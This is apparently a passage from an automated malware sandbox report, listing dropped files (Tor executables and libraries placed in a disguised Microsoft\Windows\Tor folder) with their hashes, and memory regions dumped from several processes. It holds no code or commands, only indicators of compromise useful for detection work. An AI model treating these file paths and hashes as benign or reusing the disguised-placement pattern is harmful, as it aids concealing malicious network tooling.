                                                    51fc479fd8ee9a2b72e6aa020ce5bb1c7a28f621

                                                    SHA256

                                                    98d06628e3d9c8097d239722e83ad78eb0b41b1e2f54d50a500da6d9292ff747

                                                    SHA512

                                                    6184accd206aa466278c2f4b514fd5c85820d47cf3a148904e93927621ac386890e657f09547b694c32ef23c355ae738b7c7d039fcd6c791529198c7b0b6bd1e

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent_core-2-1-7.dll

                                                    Filesize

                                                    646KB

                                                    MD5

                                                    c1507e234ff7f11a259d87a57af740be

                                                    SHA1

                                                    7478ba561c9f478ede650561867ebd2db58da42f

                                                    SHA256

                                                    d6a7d46f6fc803b50460d03c0bc14f2f128ee2becabcf1713715bcebf13ee75b

                                                    SHA512

                                                    64d0657050028d846097429ad1268844038059279e1256329716b937338de5fc1b5f50f420b8aa781c5e2a19f15158f564569db639981fef10fa5e57dfd4717b

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent_extra-2-1-7.dll

                                                    Filesize

                                                    657KB

                                                    MD5

                                                    7cb2f0f4bba8d16c3200e9ac2a25b7c0

                                                    SHA1

                                                    63cf39682bf6876f563e1567df3c55fd5939e6ea

                                                    SHA256

                                                    ec52e90c68dd0e7603df3f9fe6c909d019a7e94dc3ce0efd8baf67864a43b74b

                                                    SHA512

                                                    7a660d87739914c68cadb56a4acbf27d68fd145b3bb65b957b4c767dfabe0762c40d58faa3a2df3b3453083ea658411c79d53be5166dda844782a9cd2617a264

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libgcc_s_seh-1.dll

                                                    Filesize

                                                    1.1MB

                                                    MD5

                                                    ead6d4a87041e13b9041f78be1cb84d1

                                                    SHA1

                                                    896a336e08a1904537ee5a4a86eb0e885a18e17a

                                                    SHA256

                                                    b94b8981f8110944c5b03c9cba4066e9d0daa13687dead387bcbc772132c6d24

                                                    SHA512

                                                    34054ec79691145a8d511f9425f9ad44e07f8bfb38bd0b3251a5db3358c0055344615990fb770d4bdcbf04c9461847dfd4f6d2bac1e43ec815426a94d065c580

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssl-1_1-x64.dll

                                                    Filesize

                                                    965KB

                                                    MD5

                                                    7847c7b13b3414e8e7652880b4609205

                                                    SHA1

                                                    930670acc16157f56aaf69423e5d7705441764ba

                                                    SHA256

                                                    38200438cf0c9c20d17e5b9030d2ad2e4a1b6b9dc41c287bc603dd50d22e67bb

                                                    SHA512

                                                    c3c81dc3eb546c40b3606338deadbd63331659645dd24b5fd0d4fb3170b053fef528ee3fe005c9446176a5c049e9412ea8193ad2f8b9a7301ff67b088f1bbb6e

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssp-0.dll

                                                    Filesize

                                                    313KB

                                                    MD5

                                                    97d89dec5f6a236b6832a5f3f43ab625

                                                    SHA1

                                                    18f2696a3bf4d19cac3b677d58ff5e51bf54b9e8

                                                    SHA256

                                                    c6dca12e0e896df5f9b2db7a502a50d80d4fb014d7ec2f2ceb897b1a81f46ead

                                                    SHA512

                                                    7e82d1e37dc822a67e08bd1d624d5492f5813a33ec64f13d22caef9db35ebb9bb9913582289ebdecad00e6b6148d750ae0b4437364ef056d732734255498be54

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libwinpthread-1.dll

                                                    Filesize

                                                    608KB

                                                    MD5

                                                    624304f2ba253b33c265ff2738a10eb9

                                                    SHA1

                                                    5a337e49dd07f0b6f7fc6341755dc9a298e8b220

                                                    SHA256

                                                    27b857131977106c4a71ce626225d52a3d6e2932cb6243cb83e47b8d592d0d4f

                                                    SHA512

                                                    163820961a64b3fda33969cbb320aa743edc7a6bacebe033054c942e7a1d063f096290a59fad1569c607666429e2f3133fcfe31ef37649f9da71b453ef775e5a

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe

                                                    Filesize

                                                    4.3MB

                                                    MD5

                                                    9f2d86da7d58a70b0003307d9cfc2438

                                                    SHA1

                                                    bd69ad6ea837e309232d7c4fd0e87e22c3266ac5

                                                    SHA256

                                                    7052619814a614a1b157c5c94a92dbec22b425a0977ac8b21958b8db81e2dd65

                                                    SHA512

                                                    ce345ff77d8043f416a04b782be8e7b0d5fdea933f3ac79abb88648a9fca23d7a69f537a825d0b636ba64f80afe70f758114ddbf412bd9398800ba4b6e359a99

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\zlib1.dll

                                                    Filesize

                                                    107KB

                                                    MD5

                                                    d490b6c224e332a706dd3cd210f32aa8

                                                    SHA1

                                                    1f0769e1fffddac3d14eb79f16508cb6cc272347

                                                    SHA256

                                                    da9185e45fdcbee17fcd9292979b20f32aa4c82bc2cb356b4c7278029e247557

                                                    SHA512

                                                    43ce8d4ee07d437aaca3f345af129ff5401f1f08b1292d1e320096ba41e2529f41ce9105e3901cb4ecb1e8fde12c9298819961b0e6896c69b62f5983df9b0da3

                                                  • memory/644-3203-0x0000000000040000-0x00000000004A1000-memory.dmp

                                                    Filesize

                                                    4.4MB

                                                  • memory/644-99-0x0000000056A70000-0x0000000056B53000-memory.dmp

                                                    Filesize

                                                    908KB

                                                  • memory/644-100-0x0000000056A40000-0x0000000056A63000-memory.dmp

                                                    Filesize

                                                    140KB

                                                  • memory/644-101-0x00000000569A0000-0x0000000056A38000-memory.dmp

                                                    Filesize

                                                    608KB

                                                  • memory/644-102-0x00000000566B0000-0x000000005699D000-memory.dmp

                                                    Filesize

                                                    2.9MB

                                                  • memory/644-103-0x0000000000040000-0x00000000004A1000-memory.dmp

                                                    Filesize

                                                    4.4MB

                                                  • memory/644-98-0x0000000056B60000-0x0000000056C33000-memory.dmp

                                                    Filesize

                                                    844KB

                                                  • memory/644-118-0x0000000000040000-0x00000000004A1000-memory.dmp

                                                    Filesize

                                                    4.4MB

                                                  • memory/644-97-0x0000000056C40000-0x0000000056C94000-memory.dmp

                                                    Filesize

                                                    336KB

                                                  • memory/644-141-0x0000000000040000-0x00000000004A1000-memory.dmp

                                                    Filesize

                                                    4.4MB

                                                  • memory/644-151-0x0000000000040000-0x00000000004A1000-memory.dmp

                                                    Filesize

                                                    4.4MB

                                                  • memory/644-96-0x0000000000040000-0x00000000004A1000-memory.dmp

                                                    Filesize

                                                    4.4MB

                                                  • memory/644-1096-0x0000000000040000-0x00000000004A1000-memory.dmp

                                                    Filesize

                                                    4.4MB

                                                  • memory/644-2901-0x0000000000040000-0x00000000004A1000-memory.dmp

                                                    Filesize

                                                    4.4MB

                                                  • memory/1420-3220-0x00000202D41C0000-0x00000202D4CD1000-memory.dmp

                                                    Filesize

                                                    11.1MB

                                                  • memory/1420-3228-0x0000020369950000-0x0000020369970000-memory.dmp

                                                    Filesize

                                                    128KB

                                                  • memory/1420-3226-0x0000020368890000-0x00000203688B0000-memory.dmp

                                                    Filesize

                                                    128KB

                                                  • memory/1420-3235-0x00000202D41C0000-0x00000202D4CD1000-memory.dmp

                                                    Filesize

                                                    11.1MB

                                                  • memory/1420-3227-0x0000020369930000-0x0000020369950000-memory.dmp

                                                    Filesize

                                                    128KB

                                                  • memory/1420-3224-0x00000202D41C0000-0x00000202D4CD1000-memory.dmp

                                                    Filesize

                                                    11.1MB

                                                  • memory/1420-3231-0x0000020369970000-0x0000020369990000-memory.dmp

                                                    Filesize

                                                    128KB

                                                  • memory/1420-3232-0x0000020369990000-0x00000203699B0000-memory.dmp

                                                    Filesize

                                                    128KB

                                                  • memory/1420-3229-0x00000203699B0000-0x00000203699D0000-memory.dmp

                                                    Filesize

                                                    128KB

                                                  • memory/1420-3230-0x00000203699D0000-0x00000203699F0000-memory.dmp

                                                    Filesize

                                                    128KB

                                                  • memory/1784-3202-0x00000118D7340000-0x00000118D7463000-memory.dmp

                                                    Filesize

                                                    1.1MB

                                                  • memory/1784-3192-0x00000118D7340000-0x00000118D7463000-memory.dmp

                                                    Filesize

                                                    1.1MB

                                                  • memory/1784-3197-0x00000118D7340000-0x00000118D7463000-memory.dmp

                                                    Filesize

                                                    1.1MB

                                                  • memory/1784-3195-0x00000118D7340000-0x00000118D7463000-memory.dmp

                                                    Filesize

                                                    1.1MB

                                                  • memory/2412-39-0x000000000A780000-0x000000000A781000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/2412-10-0x0000000000150000-0x0000000001376000-memory.dmp

                                                    Filesize

                                                    18.1MB

                                                  • memory/2412-12-0x0000000000150000-0x0000000001376000-memory.dmp

                                                    Filesize

                                                    18.1MB

                                                  • memory/2412-38-0x000000000A760000-0x000000000A761000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/2412-37-0x000000000A750000-0x000000000A751000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/2412-44-0x0000000000150000-0x0000000001376000-memory.dmp

                                                    Filesize

                                                    18.1MB

                                                  • memory/3940-75-0x0000015F43800000-0x0000015F43923000-memory.dmp

                                                    Filesize

                                                    1.1MB

                                                  • memory/3940-49-0x0000015F43800000-0x0000015F43923000-memory.dmp

                                                    Filesize

                                                    1.1MB

                                                  • memory/3940-54-0x0000015F43800000-0x0000015F43923000-memory.dmp

                                                    Filesize

                                                    1.1MB

                                                  • memory/3940-52-0x0000015F43800000-0x0000015F43923000-memory.dmp

                                                    Filesize

                                                    1.1MB